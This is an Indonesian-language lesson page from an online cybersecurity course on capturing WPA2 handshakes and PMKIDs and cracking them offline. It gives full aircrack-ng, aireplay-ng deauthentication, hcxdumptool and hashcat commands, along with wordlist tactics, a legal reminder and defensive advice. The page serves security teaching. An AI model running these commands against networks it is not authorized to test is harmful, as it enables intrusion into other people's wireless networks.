Menangkap dan Memecahkan Jabat Tangan WPA2
Tangkap jabat tangan 4 arah dengan aircrack-ng dan coba serangan kamus dengan Hashcat.
Menangkap dan Memecahkan Jabat Tangan WPA2 adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 2 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Jabat Tangan 4 Arah
Saat klien terhubung ke jaringan WPA2, jabat tangan 4 arah menghasilkan Pairwise Transient Key (PTK) dari PMK (yang diturunkan dari PSK) dan nilai acak sekali pakai. Menangkap jabat tangan ini memungkinkan pemecahan kata sandi secara luring.
Menyiapkan Mode Pemantauan
Mode pemantauan memungkinkan kartu nirkabel menangkap semua bingkai, terlepas dari tujuannya, sehingga diperlukan untuk menangkap jabat tangan secara pasif. Mode ini hanya berfungsi pada kartu yang mendukung mode pemantauan.
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check killMenangkap Jabat Tangan secara Pasif
Airodump-ng menangkap bingkai secara pasif. Tunggu hingga klien tersambung secara alami, atau paksa koneksi ulang melalui deautentikasi. Hasil penangkapan jabat tangan ditampilkan di kanan atas keluaran airodump.
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...Serangan Deautentikasi
Mengirim bingkai deautentikasi palsu akan memaksa klien yang terhubung untuk memutuskan dan menyambungkan kembali koneksinya, sehingga memicu penangkapan jabat tangan baru. Tindakan ini menghasilkan banyak jejak dan dapat terdeteksi, serta mengharuskan klien berada dalam jangkauan.
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)Serangan PMKID: Tidak Memerlukan Klien
Serangan PMKID (hcxdumptool) menangkap PMKID dari bingkai beacon/probe tanpa memerlukan klien yang terhubung. PMKID lebih cepat diperoleh dan sama mudahnya dipecahkan seperti jabat tangan lengkap.
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtMemecahkan Jabat Tangan dengan Hashcat
Konversikan berkas tangkapan, lalu lakukan serangan dengan mode Hashcat 22000 (format terpadu WPA2) atau mode 2500 (format lama). Gunakan rockyou.txt bersama aturan untuk memperoleh hasil terbaik.
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dMemecahkan dengan Aircrack-ng
Aircrack-ng melakukan pemecahan WPA2 berbasis CPU secara langsung dari berkas tangkapan. Cara ini lebih lambat daripada pemecahan berbasis GPU dengan Hashcat, tetapi tidak memerlukan konversi format.
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.capStrategi Daftar Kata
Keberhasilan pemecahan kata sandi WPA2 sepenuhnya bergantung pada kualitas daftar kata. Gunakan: rockyou.txt sebagai dasar, kumpulan aturan Hashcat untuk menghasilkan variasi, daftar kata khusus perusahaan (nama+tahun+simbol), dan daftar tertarget dari OSINT.
Realitas Waktu Pemecahan
Kata sandi WPA2 acak dengan panjang 20 karakter atau lebih tidak mungkin dipecahkan secara komputasional. Pemecahan hanya praktis dilakukan terhadap kata sandi pendek atau berbasis kamus. Karena itu, panjang dan keacakan kata sandi lebih penting daripada aturan kompleksitas.
Pertahanan
Gunakan WPA3-SAE (kebal terhadap serangan kamus secara luring), atau WPA2 dengan frasa sandi acak sepanjang 20 karakter atau lebih, serta WPA2-Enterprise dengan EAP-TLS (sertifikat, bukan kata sandi).
Pengingat Hukum
Menangkap jabat tangan WPA2 pada jaringan yang bukan milik Anda adalah ilegal. Semua teknik di sini hanya berlaku pada jaringan pengujian milik Anda sendiri atau lingkungan laboratorium yang berwenang, misalnya laboratorium rumah atau AP khusus untuk pengujian.
Pemeriksaan Singkat
Apa peningkatan yang diberikan serangan PMKID dibandingkan penangkapan jabat tangan standar?
Ringkasan: Pemecahan WPA2
Menangkap jabat tangan WPA2 atau PMKID mengubah pemecahan Wi-Fi menjadi serangan kamus secara luring. Keberhasilan sepenuhnya bergantung pada kekuatan kata sandi: kata sandi pendek dan berbasis kamus cepat dibobol, sedangkan kata sandi acak yang panjang praktis tidak dapat dipecahkan. Lindungi jaringan dengan WPA3-SAE, frasa sandi yang kuat, dan WPA2-Enterprise untuk jaringan perusahaan.
Pertanyaan yang Sering Diajukan
Apakah pelajaran “Menangkap dan Memecahkan Jabat Tangan WPA2” gratis?
Ya — teks lengkap “Menangkap dan Memecahkan Jabat Tangan WPA2” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa yang akan aku pelajari di “Menangkap dan Memecahkan Jabat Tangan WPA2”?
Tangkap jabat tangan 4 arah dengan aircrack-ng dan coba serangan kamus dengan Hashcat. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.
Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?
Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 2 dari 4.
Berapa lama pelajaran “Menangkap dan Memecahkan Jabat Tangan WPA2” memakan waktu?
Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.
Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?
Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.
Semua pelajaran dalam kursus ini
- Protokol Keamanan 802.11: WEP, WPA2, WPA3
- Menangkap dan Memecahkan Jabat Tangan WPA2
- Serangan Evil Twin dan Portal Terperangkap
- Wi-Fi Perusahaan: EAP dan RADIUS